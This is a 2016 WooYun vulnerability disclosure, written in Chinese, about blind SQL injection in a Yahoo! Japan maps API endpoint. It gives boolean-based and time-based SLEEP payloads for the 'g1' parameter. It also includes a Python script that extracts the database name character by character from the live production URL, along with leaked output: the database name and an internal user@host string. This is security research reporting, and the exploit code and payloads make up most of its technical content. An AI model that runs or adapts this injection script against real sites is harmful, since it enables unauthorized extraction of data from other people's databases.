WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0176575

漏洞标题：Yahoo! Japan Website Multiple SQL Injection Vulnerabilities #2

相关厂商：Yahoo! Japan

漏洞作者： 猪猪侠

提交时间：2016-02-17 22:43

修复时间：2016-02-22 22:50

公开时间：2016-02-22 22:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2016-02-17： 细节已通知厂商并且等待厂商处理中
2016-02-22： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

http://www.alexa.com/topsites/countries/JP
Top Sites in Japan, No 1 Is yahoo.co.jp , Then Submit, One most 3 vulnerabilities;
Yahoo! Japan Website Multiple SQL Injection Vulnerabilities #2
Include: boolean-based blind, AND/OR time-based blind

详细说明：

Parameter: g1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: output=xml&iso=&g1=1 AND 4713=4713&g2=&_i=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: output=xml&iso=&g1=1 AND SLEEP(5)&g2=&_i=1

漏洞证明：

#!/usr/bin/env python
# encoding: utf-8
# yahoo.jp.py
# ringzero@**.**.**.**
import requests
import time
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
for i in range(1,30):
    for _str in payloads:
        start_time = time.time()
        url = "http://maps.yahoo.co.jp/provider/api_world_category.php?output=xml&iso=&g2=&_i=1&g1=1 AND ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str))
        result = requests.get(url).content
        if len(result) > 300:
            print _str
            break

ymap_db

maps@fe264.map.ssk.ynwp.yahoo.co.jp

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应